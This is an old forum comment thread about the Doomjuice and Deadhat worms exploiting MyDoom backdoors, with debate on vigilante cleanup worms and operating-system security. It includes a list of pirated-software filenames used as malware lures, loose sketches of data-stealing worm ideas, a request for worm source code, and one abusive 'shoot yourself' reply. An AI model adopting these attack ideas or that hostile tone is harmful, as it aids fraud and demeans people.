Too many problems with that... Boot sectors are more or less locked down by your standard anti-virus program. Unless the virus installs an already-infected copy of the new operating system, it wouldn't be able to use past infections as zombies.

Re:I wonder

[__past__]

There was this BeOS installer that was started from Windows, without having to reboot from a CD. Just take that or something similar (ISTR some old Linux distro that did the same) and mail it around, obviously people will simply execute anything they find in their inbox.

Re:I wonder

[Chris+Pimlott]

There'd be little point to this, since it even the most oblivious users would tell a difference when they don't see the Windows logo when they boot and they can't find Word.

Now, a more plausible thing would be to install Cygwin. The user won't see any difference but suddenly their computer has become a lot more useful of a platform from which to launch attacks.

Re:I wonder

[The+Limp+Devil]

Great idea! Someone should make one that installs SCO UNIX so we could blame them for this too!

Re:I wonder

[iamdrscience]

50MB email attachments don't work so well.

Re:I wonder

[Eberlin]

Unless you're looking at a really small OS, it's a payload/bandwidth issue. As fun as it would have been to network-install SuSe on people, it has got to be darn slow on a dial-up line. Besides, all that downloading slows down the "virus" propagation.

Now imagine a worm that would go through an IIS-based system, backup all their ASP files and fish for anything SQL Server-related onto a remote server, install LAMP, run ASP2PHP on those ASP files, "restore" them to the server, and electronically file for a MS refund. Sounds good, but of course people would consider this an invasion of their machines. :) Actually sounds like an extended/revised form of the depenguinizer.

Re:I wonder

[Tibor+the+Hun]

haha, THAT would be funny.

screensavers last night showed menuet os, (www.menuetos.org) written in assembly and it fits on a floppy disk. an os as small as that might be able to be carried as payload.

Re:I wonder

[Tony-A]

Now, a more plausible thing would be to install Cygwin. The user won't see any difference but suddenly their computer has become a lot more useful of a platform from which to launch attacks.

Which makes me wonder why so few Linux/*BSD attacks and why they all seem to fizzle out. Not to knock Cygwin, but surely the real thing would be better.

Re:I wonder

but a network install from, oh say, kernel.org and a little bit of environment knowledge can get the job done. fake an array of refferers and user-agents and you should be a-ok. I wouldn't want to deal with the whole boot sector jazz, though.

A "Dark Plot?"

[Tiro]

I believe it. Note how they used the SCO DDoS in order to deflect attention from what other things the worm does.

Tiro's Law: Any good thing, like the internet, will be used for exploitation

Old News

[Via_Patrino]

Old news RTF./
How hard is to click on the icon on the side of the article before posting a new article?

Re:Old News

[LostCluster]

This is starting to seem like a cyber version of 9/11/01. So many new worms are being reported so quickly that it's starting to become hard to keep the different stories straight. It seems to magnify the effect of fear to have multiple events on top of each other rather than one at a time...

Lamest... Names... Ever

[addie]

Maybe these guys should just start hard rock bands: MyDoom, DoomJuice, DeadHat... It's like when I worked at LaserQuest and had to listen to all the stupid ideas kids had for their codenames.

What's next, ThunderCat? MrDoom? Anyone smart enough to write a virus this effective must be more imaginative than this!

Re:Lamest... Names... Ever

[SirTalon42]

Blame the AV companies, their the ones that have no imagination (and come up w/ the names).

not exactly "novel"

[DaCool42]

I wouldn't really say this is a novel idea. It seems kind of obvious to me. Worm leaves a gaping hole...write something to exploit gaping hole. duh.

Re:not exactly "novel"

[LostCluster]

What's new is that it appears the creator of the gaping hole put out a sequel worm that exploits the hole. No need to understand virus propogation techniques anymore, those who want to exploit the hole for their own use just need to reprogram the payload part of DoomJuice...

Re:not exactly "novel"

[mph]

I wouldn't really say this is a novel idea. It seems kind of obvious to me. Worm leaves a gaping hole...write something to exploit gaping hole. duh.

You idiot! By writing a post like that in public, you've just disqualified yourself from ever working in the US Patent Office!

Re:not exactly "novel"

[PatrickThomson]

It seems kind of obvious to me. Worm leaves a gaping hole...write something to exploit gaping hole.

It's a timeless concept, the giver and the receiver.

Re:not exactly "novel"

DoomGoatse?

white hat worms?

I wonder... what are the legalities behind having a worm go around, attack the backdoor created by MyDoom, and cause an alert box containing the infection info to pop-up on the user console? Or, change the person's wallpaper to a similar message so that they dont just blindly hit ok?

Re:white hat worms?

Unauthorized access is unauthorized access. The authorities would be happy to prosecute a well-meaning good samaritan. Vigilante justice is (unfortunately) illegal in all circumstances.

And most people in the know would agree that Welchia, which was the worm intended to fix Blaster infections, was actually worse than Blaster in terms of its impact on networks.

Organized Crime?

[knarfling]

In the Netherlands there is a newspaper reporting this proves MyDoom was initialy spread by organised crime

I am willing to admit that SCO is a crime, but who is claiming that they are organized??

I think I would be willing to admit that it was spread by a criminal comany.

Idibus Martiis

[cwernli]

Will anybody read this on March 11th, i.e. 28 days later ?

Re:Cyber war? Puleeeze

[LostCluster]

What you described is just a standard-grade cyber scam.

If organized crime is behind MyDoom, then it certainly allows them to upgrade to a cyber war. MyDoom takes a territory of the Internet over, otherwise innocent user's PCs suddenly do the work of the hackers. No longer would this crime group need to rent out or hack individual servers to run cyber-scams, MyDoom's backdoor gives them full invisible control the hacked PCs, including the ability to harvest random users' indenties and contacts.

Novel?

[glenebob]

>> it still is a novel way to spread a virus

I think the word I would have used here is 'obvious'...

Taco can't spell

"ZDNet Australia is reporting that two new worms, Doomjuice and Deadhat, are taking over computers previously infected by the MyDoom virus. Apparantly [sic, should be "apparently"] they try to uninstall the MyDoom virus and then take over the PC to start their own malignant work. Whilst the thread [sic, should be "threat"] these two worms pose shouldn't be to [sic, should be "too"] big, both needing a MyDoom backdoor, it still is a novel way to spread a virus.In [sic, should be "virus. In"] the Netherlands there is a newspaper reporting [that] this proves MyDoom was initialy [sic, should be "initially"] spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

Laugh with me...

[crimson30]

1. Go here: doshelp.com
2. Block applicable ports
3. Smile when alerts are issued

Re:Laugh with me...

[ron_ivi]

Are you suggesting people block all those ports because there are known windows trojans that use them?!?

Sure if you block ports 21, 25, 53, etc you might be safer, but far less functional a system as well. If you go that far, I think you'd be better firewalling off all ports and just opening the ones for the services you _want_ to have exposed.

Re:Laugh with me...

[SirTalon42]

Nicely said! If your blocking ports (if you even have the slightest clue what ports even are really), I bet you already are prepaired for a majority of virii.

This just proofs there is an imminent thread...

[ErnstKompressor]

of WMDs in Iraq...

I think the solution would be a really big spool...

A way to deal with worm outbreaks?

[gokubi]

"Apparently they try to uninstall the MyDoom virus and then take over the PC to start their own malignant work."

When a big worm comes out, wouldn't it be possible to write another worm that would utilize the backdoor, get rid of the worm, and then hang about to make reinfection impossible?

My organization took care of the worm in the first few minutes after it started spreading, but there seem to be a lot of people still out there who aren't protected (if the number of inbound mails my mail server quarantines each day is any indication).

If someone in a white hat wrote a MyDoom imobilizer worm, and then released it, wouldn't that put a speedy end to MyDoom in the wild?

Re:A way to deal with worm outbreaks?

[delirium28]

This happened with one of the other worms last year (Slammer or something similar, I can't recall right now).

The problem is that by creating a worm that cleans up the original malware worm, the fix is just as bad as the original virus. You're still using a lot of bandwidth that isn't yours, you're still sending out a program to change someone else's system without their permission, etc.

On the surface it looks like a good idea, but unfortunately it has a lot of serious drawbacks.

Re:A way to deal with worm outbreaks?

[tgd]

And then they'd go to jail.

I may not lock my windows, but you better believe you're going to get arrested if you walk into my house and try to lock them for me.

Re:A way to deal with worm outbreaks?

Two problems.
If the whitehat compromised machine starts spamming every machine it sees with backdoor checks, then that solution would be bad for traffic. If that whitehat'd machine only reacts to another machine when it receives a live payload, then that's a little different.

But then you have the problem of getting rid of the whitehat implementation. Your whitehat 'solution' would need to be waiting in the background in order to do its thing. And when there are many different exploits to 'solve', then there will be many different processes hanging out in the background.

Re:A way to deal with worm outbreaks?

[el-spectre]

Yeah... remember Welchia/Nachi about 6 months ago? That's pretty much what it did, and it cost billions.

Re:A way to deal with worm outbreaks?

[Kaki+Nix+Sain]

I think I would rather see a worm that flashes the screen in some scary way and says, "Hi, you just got a worm...", then goes on to explain how they shouldn't be opening everything that they are sent, maybe refers them to some educational internet sites, and ends with a nice threat about the sort of evil things that the worm could be doing other than just ripping off the user's address book for further propagation.

Hey man, lay off

My Windows box is much better than some stupid ol' Mac. My system installs software ALL ON ITS OWN! Heh, yeah. This software makes my system do things I couldn't have done even if I tried...like sending mail to a bunch of people I haven't even met.

My system is part of a new global network. Your Mac just sits there and runs. :-P

dark underworld crime lords

[perz0n]

Well isnt it obvious the real crime lord here is Mr Bill Gates. Wasnt it his product that started the original backdoor allowing MyDoom to become part of a more millicious super virus?

for the non-dutch

[sosume]

or those who cannot get past the registration links:

Amsterdam - There are signs that the computer virus MyDoom has been brought into circulation by organised crime syndicates. The wormvirus was accompanied yesterday by the evil program 'DeadHat'. Microsoft and software maker SCO have a quarter *billion* dollar in stock to reward the tip that will lead them to its creators.

According to the British research firm mi2g, deadhat is designed to provide its creator with sustaining, long-term control over a system. This power could be abused to hostage websites.

It is also possible to abuse the pc in sending spam e-mail, and the program is capable of harvesting passwords and other confidential information. Deadhat is an intelligent software agent, a program .....

[snip] the really boring part

According to mi2g, deadhat has encrypted intelligence, waiting to be activated. "This definitely looks like the work of organized crime"

Meanwhile, Soomjuice has come to surface. Another worm which seems to battle for control of the PC.

Re:for the non-dutch

[hotair]

These follow on worms seem like crude attempts to implement Curious Yellow.

http://blanu.net/curious_yellow.html

I'm really surprised that we haven't seen various implementations taking over large numbers of computers.

My only thought has been that the kind of person who implements Curious Yellow is sufficiently more skilled than the average worm writer that they choose to be subtle and slow. If that is the case, then I expect that the 75,000 is a very small number of machines compared to those that are already running a variant of Curious Yellow.

Just some rambling thoughts.

Re:for the non-dutch

[sosume]

My only thought has been that the kind of person who implements Curious Yellow is sufficiently more skilled than the average worm writer that they choose to be subtle and slow Unlikely: the virus will be detected within days so the infection speed must be high to gain momentum.

Re:for the non-dutch

[jumbo008]

This would not possibly be the same mi2g as in according to mi2g 'MyDoom is now estimated to have caused $38.5 billion of economic damage worldwide so far' now would it?
That would be 40% of the 9/11 damages to copy a comparison also made in Dutch media.

Re:for the non-dutch

[Eric+S.+Smith]

Unlikely: the virus will be detected within days so the infection speed must be high to gain momentum.

If the infection speed is low, it may also take longer for the worm to be detected. Furthermore, anti-virus vendors are less likely to assign a high threat rating to a slow infector, which could cause them and their clients to react more slowly.

If you want your worm to be long-lived rather than famous, a low infection rate might be advantageous.

For Newbies, not experienced users.

[Azureflare]

Talk about overreacting. But, you proved the grandparent posters point. You are obviously not a user who needs to switch to a mac. You know what you are doing.

These people STILL infected with MyDoom don't know the first thing about computer security. They would be MUCH MUCH better off with a Mac than with windows. All they probably do anyway is chat with their little friends on AIM and check their webmail.

It's obvious that windows is NOT the perfect OS for clueless newbie users, because it leaves gaping holes for them to be abused through. Think about it from the newbie point of view, not the experienced user point of view.

Thank you.

Re:For Newbies, not experienced users.

[Azureflare]

Sorry, I was overreacting a bit as well in my post. I'd just like to clarify windows does NOT have "gaping holes" for users to be abused through...As long as they keep up with updates. What I meant was that it is easier for people to be abused on Windows machines than on other alternative platforms.

Then again, the cost of changing systems may not be warranted in this case. The user would probably be far better off taking a class or two in basic computer security, or some such. I'm not even aware if those kind of classes are even offered thouhgh.

Re:For Newbies, not experienced users.

[Kenja]

So explain how using a Mac will stop people from downloading a file from Kaza or what not and double clicking on it. If enough dumb users are using a Mac some one will just release MyDoom.Mac as an app called OfficeXp-Macintosh-Crack.app

Re:For Newbies, not experienced users.

[ball-lightning]

These people STILL infected with MyDoom don't know the first thing about computer security. They would be MUCH MUCH better off with a Mac than with windows. All they probably do anyway is chat with their little friends on AIM and check their webmail.


And that's great, until Macintosh's become popular enough for viruses to be written for them (at which point its going to be a massacre). A guy I work with owns a Macintosh, and he brags about how he doesn't need to run any antivirus program and how he can open all attachments. If a virus like MyDoom was created for the Macintosh, how much you want to bet my coworker (and people like him) would get infected right away, because they aren't using common sense? Windows may be buggy, and windows may have a lot of security holes, but in this case, MyDoom does not take advantage of any of them MyDoom takes advantage of the traditional weakest link in any security system, people.

Re:For Newbies, not experienced users.

[Azureflare]

Right, I overreacted a bit in my post... (I did a supplementary post afterwards... Man sometimes I wish I could edit posts on slashdot!)

Widespread use of an operating system does cause a problem for protection from worms, but I think the adoption of Macs is going to be limited by the fact Macs are so expensive (well not the old iMacs). At any rate, I think the BEST solution isn't getting a new type of machine or operating system, it's getting those users to educate themselves about the risks they face on the web.

If only there was a way to get people to learn... I don't know though, I've given up on people. They just don't seem to want to learn new things about computers! I think people still perceive computers as somewhat magical and/or mystical.

Re:For Newbies, not experienced users.

And that's great, until Macintosh's become popular enough for viruses to be written for them (at which point its going to be a massacre).

Very few people are currently buying computers in the future (e.g. when "Macintosh's become popular enough"). Most of them buy computers now, in the present. _For now_, no matter how little you know about computer security, you'd be safer on a Mac. I'm pretty sure that's all the grandparent post meant.

Re:For Newbies, not experienced users.

windows does NOT have "gaping holes" for users to be abused through...As long as they keep up with updates.

Should be modded up as funny.

MS takes WEEKS or MONTHS to produce patches. During that time, everyone still has the "gaping holes".

Re:For Newbies, not experienced users.

[aztracker1]

I pretty much agree, at this point, I stop all executables, and .zip files at my mail server.. kind of a pain, but between that, and the 25 RBLs I have setup, I only get about 10-15 unwanted emails a day... *sigh* ... I won't run windows in front of a firewall now, even if psuedo-secure (only known port s available) .. too much of a pain.

Personally, I like IIS as a webserver, and happen to like .Net.. and as mono matures, am more, and more considering the switch... I haven't liked MS's political stances for several years now, and linux is finally "getting there" enough for a serious look... I can run my favorite text editor under wine, and use firefox (formerly firebird) as my primary browser, and thunderbird for email.. only my work keeps me tied to windows.

Seriously think in about a year or so, will be able to switch with little drawback, and may even just run windows via vmware inder linux... the last try at it with suse and ximian desktop a few months ago wasn't so bad.. a few kinks.. but worked... may make another go, in a few more months. (Already use windows versions of a lot of OSS software as it is now anyhow).

Re:For Newbies, not experienced users.

[Nurseman]

" I pretty much agree, at this point, I stop all executables, and .zip files at my mail server.. kind of a pain, but between that, and the 25 RBLs I have setup, I only get about 10-15 unwanted emails a day... *sigh* ... I won't run windows in front of a firewall now, even if psuedo-secure (only known port s available) .. too much of a pain."

I think this goes to the point, you are obviously a well informed, savy computer user. You are not the problem. People who click on the link "to see what this does" are the problem. My friend who has a Masters in Finace and works for a VERY large firm, won't let me email him at work "because I only use it for work" Yet at home he has broad band , direct to his XP box, always on, and he has every piece of crapware, malware, and such installed. (He does run Norton AV, and I send him reminders update the definations when I read of particularly bad virii) He just can't see the danger of Bonzi Buddy and other "helpers" installed on his machine. These are the people who we need to educate.

Re:For Newbies, not experienced users.

[aztracker1]

"I think this goes to the point, you are obviously a well informed, savy computer user. You are not the problem. People who click on the link 'to see what this does' are the problem. My friend who has a Masters in Finace and works for a VERY large firm, won't let me email him at work 'because I only use it for work' Yet at home he has broad band , direct to his XP box, always on, and he has every piece of crapware, malware, and such installed. (He does run Norton AV, and I send him reminders update the definations when I read of particularly bad virii) He just can't see the danger of Bonzi Buddy and other "helpers" installed on his machine. These are the people who we need to educate."

Yeah, I'm pretty good about it.. I usually don't open attachments.. although, I almost got duped by one of the "Paypal" scams, that have the %01's in the url.. my way bad.. noticed it after clicking the link.. and I use thunderbird for mail.

I think in this instance it is more a point of human nature.. only way around that is to prompt for a password everytime anyone wants to run anything... which simply won't work.. the solution is to work on human nature... although there are flaws in any os, or packages with an os, which only time can say, the shear number of people running various windows versions makes it an easier target...

Re:Cyber war? Puleeeze

[saskboy]

But nothing is new with MyDoom. Maybe the intent, but there are still dozens of active viruses out there with back door capabilities that could be exploited by crime, or by spammers [which are criminals I suppose].

Why commit computer crimes from your own machines, when you can do it from another person's, and in fact connect to a 2nd or 3rd infected machine from the first infected machine to add another layer of dificulty to any investigation?

The ability to harvest contact information exists in a simple forwarded joke email. This is not advanced "war" stuff. If it was advanced, people wouldn't have noticed.

ThunderCat's taken

That's the next name for Mozilla's standalone email client. Formerly known as Thunderbird.

Re:ThunderCat's taken

I'm still waiting for FireMonkey.

Exchange servers beware

[t0qer]

This could have happened to anyone I guess....

Last week I get a call from another tech friend, "Hey toqer, I got this customer and they got infected with MyDoom. The NAV wasn't set to exclude the exchange store on the server, and it wiped out their calendaring info, the server needs all its logs rebuilt"

I asked him for more info. Logs rebuilt? WTF was he talking about? Apparently they had brought in an "Exchange Expert" to fix the problem. The guy spent about 2 days out there and didn't get anything done. After calling them I went out to see exactly what the problem was.

This office is a lawers office, and they're specialty is wills and trust funds. I was met by a really nice french woman at the door. "Toqer, please follow me and I will show you what the problem was"

She first showed me their main problem. Whenever they would try and modify the big bosses calendar, outlook would spit out some nonsense about unable to connect to his free/busy information. Second problem I noticed was the entire network was running on NT4.0, and the machines were all pentium1 class PC's. "Good thing this is hourly" I said to myself.

Looking at the NAV logs, it looked like it had deleted some files from d:\exchngsrv\mtadata (not exactly, this is best recolection) First thing I did was set NAV to exclude those folders. Good, done.. Now it was time to fix the problem itself.

Now I don't have the exact KB article, but the MS solution was to log in as the affected user. Backup his exchange store to personal folders. Use the exchng32 client to delete the calendar folder, then launch outlook with a /resetfolders switch, and finally re-upload his calendar from the PST. After doing it it worked and they were happy.

It took me 4 hours to fix it, nice little chunk o change in my pocket. Thanks MyDoom!

Re:Exchange servers beware

[JaredOfEuropa]

Apparently they had brought in an "Exchange Expert" to fix the problem. The guy spent about 2 days out there and didn't get anything done.
...
It took me 4 hours to fix it, nice little chunk o change in my pocket. Thanks MyDoom!

Sounds like the Exchange expert was the smarter person... het gets to bill for 2 days of work! Plus, he didn't fix it so he was probably looking at some more work... until you ruined that for him! ;-)

Cleverer Social Engineering

[GillBates0]

According to the Symantec Security Response page on the DeadHat (parody of RedHat?) worm spreads through Soulseek disguised as one of the following:

* Windows2003Keygen.exe
* mIRC.v6.12.Keygen.exe
* Norton.All.Products.KeyMkr.exe
* F-Secure.Antivirus.Keymkr.exe
* FlashFXP.v2.1.FINAL.Crack.exe
* SecureCRTPatch.exe
* TweakXPProKeyGenerator.exe
* FRUITYLOOPS.SPYWIRE.FIX.EXE
* ALL.SERIALS.COLLECTION.2003-2004.EXE
* WinRescue.XP.v1.08.14.exe
* GoldenHawk.CDRWin.v3.9E.Incl.Keygen.exe
* BlindWrite.Suite.v4.5.2.Serial.Generator.exe
* Serv-U.allversions.keymaker.exe
* WinZip.exe
* WinRar.exe
* WinAmp5.Crack.exe

This is also a Social Engineering technique similar to the catchy email sent by other recent worms.

The difference I see is that the filenames are catchier and seem to be targetted towards a more computer savvy audience. Normal Windows users wouldn't need to look for WinRar.exe and the other security software cracks/etc...but then, they're the ones who opened the MyDoom attachments in the first place.

Get the dumb users with vulnerable PCs through email attachments, and break the more secure computers/users through enticing downloads!

Re:Cleverer Social Engineering

[Elwood+P+Dowd]

It's worse when the download actually works. Then they've no reason to be suspicious.

Re:Cleverer Social Engineering

[hetairoi]

just like users opening random email attachments, anyone running .exe's (on a windows machine ok, don't tell me you don't have to because you run linux, so do I) from soulseek/kazaa/edonkey/whatever that doesn't scan the file with some type of virus scanner first needs a minimum of 10 whacks with a Clue-by-Four

Re:Cleverer Social Engineering

[triclipse]

Actually, there are more like 10 - 100 trillion cells in the human body :)

I think you mean that...

... the editors don't proveread.

New Welchia Worm

[fdiskne1]

Whereas the new Welchia/Nachi worm cleans the MyDoom viruses, sets the hosts file back to just 127.0.0.1 localhost, installs a few Microsoft patches, reboots and scans for other MyDoom, MSBlast and Welchia infected machines to clean. It also sets up a web server on the machine serving a webpage with a cryptic message about various Japanese and Korean massacres. It then disables itself on June 1, 2004, or after running 180 days, whichever comes first.

I don't normally like any Windows virus, but I have a tough time not liking this one.

Re:New Welchia Worm

[stratjakt]

Because your a clueless slashbot.

Welchia had a much higher cost in terms of sucking away bandwidth. It brought down more network then the orignal worms did.

Re:New Welchia Worm

[genmanath]

It's true that the worm you describe is a relatively polite worm, but it's still a worm. A gang of burglars which decides to stop breaking and entering in a certain neighborhood after a certain date is still a gang of burglars breaking, entering, and making off with other people's things.

I was employed as a support tech when the MSBlast/Welchia infections started in earnest. I spent a lot of time that could have been used much more productively cleaning it off machines all over the campus. As a once and future support tech, my tolerance for such is slim, and even slimmer when the worm is written to be 'helpful', given that Nachi was more of a problem than Blaster.

Re:New Welchia Worm

[ericandrade]

It doesn't mean that this "white" virus doesn't cause damage.

When the original welchia worm came out, it crashed most of air canada's computer system, leaving many passengers stranded, and lots of employees trying to remember the pencil and paper way of booking a flight.

open mouth, insert foot

Grammer check anybody?

spelling check, anybody?

Hmmm....

[fizban]

MyDoom: "Who are you?"

DoomJuice: "I'm your Grim Reaper."

MyDoom: "Like hell you are. This is my machine, punk."

DoomJuice: "Prepare to meet thy maker (wink wink)."

MyDoom: "Over my dead process."

DoomJuice: "Look, a little old lady on a Windows 98 machine!"

MyDoom: (turns) "Who? Where?"

DoomJuice: "Your Mom." *BONK* "Muhahahaha! Mine, the world is mine!"

Re:Hmmm....

+1 Insightful, -1 Troll. What can I say, I'm an Insightful Troll.

Yeah, Slashdot accounts should have an alignment, like ni AD&D.

I think I'd be an Underrated Troll

"threat these two worms pose shouldn't be to big"

[jdunlevy]

Whilst the threat these two worms pose shouldn't be to big, both needing a MyDoom backdoor...

Maybe not a big threat in the sense that most of us reading this have been taking precautions against viruses like MyDoom all along (or were on Macs or Linux), but there's still a pretty big secondary threat to all of us who use the internet. I'm still seeing a lot of MyDoom-infected computers out there: a quick look at my mail server shows examples -- sometime multiple examples -- of MyDoom sent from dsl hosts in cerfnet.com, telus.net, sprintbbd.net, and ameritech.net just within the last hour). When Doomjuice and Deadhat get on these machines and start sucking up neighboring bandwidth with their DoS or whatever, it's a problem -- even if it's not actually your machine that's infected.

debian is vulnerable too!

make sure you keep your debian boxes behind gentoo firewalls guys!

Debilian

is the new release, the worst possible distro wanna-be, total crap

Re:Cyber war? Puleeeze

[LostCluster]

The difference between killing as street murder and killing as an act of war lies simply in the volume and intent. We're crossing the line into war because MyDoom is a much bigger problem than any obscure exploit.

For Newbies, not experienced users???

[Saeed+al-Sahaf]

These people STILL infected with MyDoom don't know the first thing about computer security.

You make some excellent points. And, *why* should the average person *be* an expert on computer security? Why *WHY* should average users need to hassle with patching their box every *fucking* week? I've resisted the Mac for years (price has kept me away), and now have several Linux boxes in addition to my Win boxes, but...

It's obvious that windows is NOT the perfect OS for clueless newbie users

Linux just isn't there yet for those who can not or don not want to deal with security issues and such. There is a big trade off in ease of use for the *average* user. Lack of software and difficulty installing software is still a big issue. Sorry, Apt-Get and RPMs still don't cut it with the *average* user.

Re:For Newbies, not experienced users???

*why* should the average person *be* an expert on computer security?

They don't need to be an "expert". You don't ned to be an 'expert mechanic' to know something is wrong with your car when it won't start.

Why *WHY* should average users need to hassle with patching their box every *fucking* week?

Why *WHY* should average drivers need to hassle with gassing their car every *fucking* week?
And changing the oil every *fucking* year?

*yawns*

see subject

Grammar monitor here...

[mikehunt]

So quoth he: "the threat these two worms pose shouldn't be to big,"

Hey Mr. Taco! Maybe you should proofread your submissions.

At least you got shouldn't right!

DebilianNet

as long as u don't use that piece of crap Debian you're juust fiine

Re:Get a PENCIL AND PAPER

[Professr3]

Etch-A-Sketch... "You shake it to reboot" - Dilbert

Kinda scary

[promethean_spark]

That a worm that digs for personal information goes active right when people start doing their taxes in the US. There are alot of bank account numbers being typed in right now. A worm that hacks taxact to send an account number the virus writer can access instead of the user's would be quite profitable. It'd probably only work for 24 hours or less, but it could steal hundreds of millions in that time.

Deadhat, but what's next? Mandrunk (Mandrake)...

[TheTranceFan]

• KnoppAxe (Knoppix)
• Debunk (Debian)
• Genital (Gentoo)
• Sux3 (SUSE)
• Hackware (Slackware)
• PCSCOOS (PCLinuxOS)
• Fedup (Fedora)
• DamnSCO (Damn Small)

...and that's just the first 10 distros listed on DistroWatch.

If these guys name a variant after every Linux distro, we're all in big trouble!

Avoidable

[JRSiebz]

IF everyone would have updated their systems with the patch in july 2003 (beofre the MyDoom virus and its variants came out), no one whould have ever gotten any of them. And the news media would have nothing to talk baout.

Re:Avoidable

[SirTalon42]

Patch? MyDoom didn't use any exploit (except OPEN THE ATTACHMENT FOR FREE PORN! (actually fake sys admin crap)). What patch are you talking about?

Re:Avoidable

[JRSiebz]

oops, i meant blaster since i never get any of them ;-) i get em all confused :-)

Re:Grammar monitor here...and surprised!

[mikehunt]

Wow, just as I finish reading another thread...I click 'refresh' and behold: too !!!

Did I miss something?

[metroid+composite]

The article you're linking to is about MyDoom.C. This article is about DoomJuice and DeadHat, which are a considerably more interesting development than the Umpteenth version of the same virus (and, heck MyDoom will probably reach Z too...given enough time).

euhm dutch newspaper?

[1nhuman]

Im Dutch but never heard of this regional newspaper. Besides the region it's printed version is published in is rather euh.. backward (Im generalising, I know). I also tried to subscribe to the online version but there's an error in the subscribe form. Well at least with Mozilla on a Powerbook.

I smell bullshit

[El]

According to mi2g, deadhat has encrypted intelligence, waiting to be activated. Either a) the code to decrypt it is in the virus itself, making decrypting the "intelligence" trivial, or b) other code is required, in which case, why not just use the back door to install the "intelligence" rather than distributing it beforehand? I suspect what that calling "encrypted intelligence" is really something most of us would call "random bits" just thrown in to confuse people.

Viruses : Cutting Edge of Artificial Intelligence

[Pup5]

It's interesting to watch the development of more advanced viruses. We've created the perfect medium for their development, existence within an artificial world.

• Food is computing power, which it steals.
• Prey are vulnerable computers, with computing power unprotected.
• Predators are virus scanning and eradication software.
• Reproduction is checked only by environmental factors.
• Evolution has developed two clear attributes: transport and payload.

It will be very interesting to watch this area develop, especially considering it's place in society. It's incredible that not only have software companies been given virtual total immunity from the financial impact of their defective products, but that they have convinced the right parties that people who expose their defects are criminals. Truly incredible.

Re:"threat these two worms pose shouldn't be to bi

[SirTalon42]

Huh, I seem to get mostly hit by AOL accounts, I didn't realize it was MyDoom till I read an article that said the port number... Good old FireStarter

Theory vs. practice

[Vexinator]

I believe the big worm from last year which you are refering to was MSBlaster, and the modified worm that was written to patch/remove it was Welchia.

Now I'm not condoning the use of a worm to remove another worm, but the real problem of Welchia is that it was poorly thought out. It brought down entire networks with it's ICMP traffic and attempts to download the DCOM RPC patch from Microsoft.

In theory, a well written worm could remove an existing infection and patch the affected computer, with a minimal and transient impact on the computer in question.

In practice, the removal worm is prone to crappy design (most likely due to a rushed timeline) and ends up being yet another problem.

Re:Organized crime?

Would you take a second of your time to help wipe out stupidity?

If so, fucking shoot yourself in the head.

Re:Organized crime?

[mdielmann]

Do you prefer scented or hot oil?

Parasites

[BranchingLichen]

So, naturalists observe, a flea
Hath smaller fleas that on him prey;
And these have smaller still to bite 'em;
And so proceed ad infinitum.

-- Jonathan Swift

Re:Organized crime?

> > When are the nation states going to wake up and start an international war against spam?

>When the spammers have oil.

Or when they have WMD ... uhh .. wait, never mind

Similar to Hepatitis D vs B

[henryhbk]

So this is similar to the real life virus Hepatitis D, which is slightly damaged and can't infect a host cell unless actively infected with hepatitis B. It has interesting implications for biology that one can look at the spread of dependent pathogens using computer models, by looking at the spread of these piggyback worms.

Provinciale Zeeuwsche Courant

[Pflipp]

Who would ever have thought that the Provinciale Zeeuwsche Courant beat Slashdot at this news topic.

That's MY Domain!

[TechyImmigrant]

I have owned the deadhat.com domain for a few years now. It is a simple pun on RedHat and the site is of interest to a very limited group of people.

I am not at all happy that someone has sullied the good name of my website with a worm.

Shouldn't that be in quotes?

[interactive_civilian]

DougWhite said*

The "music" comes to you after you sell your soul to the RIAA?

There...fixed that for you. :D

Switching OSs isn't the solution

[Raptor-DP]

I've heard many people say 'well, if you'd switch to mac or linux you wouldn't have this problem.' If one person switches to another OS, they still have to deal with the crap that gets written for windows, because like it or not since the majority is windows, and if its a virus that generates massive amounts of web traffic we all have to put up with it. We all have to deal with the slow downs and the downed servers, not that microsoft's website being down is that great of a loss. At least untill you're a network admin and need information on something critical and can't get to their knowledge base. And if that wern't enough, there are other results of this. It makes the internet look unsafe, and a place that needs outside control. I personally would hate to see more laws and acts then we already have designed to make the internet more 'secure'. Acts set in place to regulate the internet itself, or even more frightening, acts set in place on software makers. Every single new virus that comes out, is a potential launching point for so called Trusted Computing. Because, like it or not, holding the software company responsible for its customers not updating their sofware is stupid. Not saying that Microsoft shouldn't be held responsible for their excuse for a decent OS, but its not like they aren't at least making patches and fixes for the problems found... slowly, yes ... but at least they are released. And I, while not enjoying Microsoft's software, have to use Windows for certain things, and am glad they are finally taking care of the problems they have. But am completly pissed the hell off at their supposed Trusted Computing, an evil that must be stopped. On another note, has anyone noticed an in crease in DNS downage? I've had a few people tell me about problems, that when eventually looked into, were because of downed DNS servers. Possibly a result of MyDoom and Co.?

Anyone want to post/upload the source code?

anyone actually got the source code and is willing to put it online?

According to Microsoft its Unix's fault...

[WotanKhan]

that these worms spread. No kidding, I was just at a TS2 seminar (4 hour sales pitch you sit through to get free software, I skipped out after two). The microsoft rep had a powerpoint slide talking about the latest wave of worms and, one of the bullet points said that it was a social engineering problem not software security because the recipient runs the attachment.

But the bullet point that made me spit up my drink was: "Spread by Unix email servers".

hmmm...

[efextra]

When the spammers have oil.

... does snake oil count?

Just couple of thoughts...

[fi-greenie]

Intresting.

We had couple of infected computers, which had MyDoom on them. After extensive registry and file search I found information about the crackers, who were dumb enough to use rootkits with ASCII encoded configuration files. There was all the information for a serious bust there, where they could be found, their passwords and information, which could be used to get their IP addresses (which I did) and so forth.

These fellows were using the infamous xs4all.nl from the Netherlands, but rest of the information indicated, that the people behind the attack were from Poland, Czech and Russia. This wasn't really a suprise for me, because many of the so called script kiddies are from these countries - at least, those who annoy people in the Western Europe and Scandinavia.

I wish they could do something useful with their cut&paste -skills instead of making IRC bots and FTP servers. It just seems, that these people are just bored and not necessarily ill-faithed.

Effects on Business

[halfacat]

I work at a software/ISP company in sales and recieved an email from the MIS department yesterday stating that the reason i might not be getting emails from clients and others is because they have a machine infected with MyDoom. Is this correct, or are they just covering up for having a f--ked up mail system that is dropping emails?

Now dont get me wrong we have a really good MIS department, well i dont really know how good they are as this is my first software co., but things seem to run fairly well and they keep a pretty tight lid on everything. However, there was a slight rumor a few weeks ago that someone on the inside might have infected us. Just how damaging would this be on a company that provides somewhat critical aspects of the Internet (ie. domain registrations)? How far does this virus go and what havoc does it cause?

Troll, or just an idiot?

A linux default installation, without modifying services and patching, has many, many flaws.

The # of windows viruses circulating is absolutely due to the fact that the majority of users run MSW. If the majority ran *nix, then viruses would be coded to reflect this.
